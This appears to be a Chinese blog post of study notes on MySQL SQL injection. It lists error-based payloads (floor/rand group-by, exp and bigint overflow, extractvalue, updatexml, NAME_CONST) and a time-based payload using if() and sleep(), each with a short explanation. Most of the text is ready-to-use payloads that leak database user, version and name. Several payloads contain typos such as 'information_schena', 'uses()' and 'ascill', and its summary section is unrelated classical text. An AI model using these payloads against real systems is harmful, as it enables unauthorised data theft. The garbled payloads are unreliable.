一、基于报错的 SQL 盲注------构造 payload 让信息通过错误提示回显出来
select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
对此语句进行解释:count()进行计数,concat()进行sql语句的连接,floor函数向下取反,rand()函数生成所及数0-1之间,其中a是别名,造成错误的原因分组后数据计数重复造成的错误。
以上语句可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),
floor(rand(0)*2))
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))
如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union
select !1) group by concat(version(),floor(rand(0)*2)
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))
如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schena.tables group by concat(password,@a:=(@a+1)%2)
double数值类型超出范围
select exp(~(select *from (select uses()))a)
exp是以e为底的对数函数
bigint超出范围~0是对0取反
select !(select *from (select user())x)-~0;
详细内容来自http://www.cnblogs.com/lcamry/articles/5509124.html
extractvalue(1,concat(0x7e,(select @@version),0x7e)) se//mysql 对 xml 数据进
行查询和修改的 xpath 函数,xpath 语法错误
extractvalue()函数
extractvalue(1,concat(0x7e,(select @@version),0x7e))
对extractvalue函数解释
extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。
xml_frag:xml文档对象的名称,是一个string类型。
xpath_expr:使用xpath语法格式的路径。
SQL报错注入的应用:若xpath_expr参数不符合xpath格式,就会报错。
~符号(ascii编码值:0x7e)是不存在xpath格式中的, 所以一旦在xpath_expr参数中使用~符号,就会产生xpath syntax error (xpath语法错误),通过使用这个方法就可以达到报错注入的目的。
updatexml()函数
updatexml(1,concat(0x7e,(select @@version),0x7e),1) //mysql 对 xml 数据进行
查询和修改的 xpath 函数,xpath 语法错误
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
//mysql 重复特性,此处重复了 version,所以报错。
二、基于时间的 SQL 盲注----------延时注入
基于时间盲注if函数
逻辑判断函数if()
if(expr1,expr2,expr3) 如果expr1为真,则if函数执行expr2语句,否则if函数执行expr3语句
if(ascill(substr(database(),1,1))>115,0,sleep(5))
//if判断语句如果条件为假则执行,sleep()语句
总结
逍遥游,齐物论,养生主,人间世。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
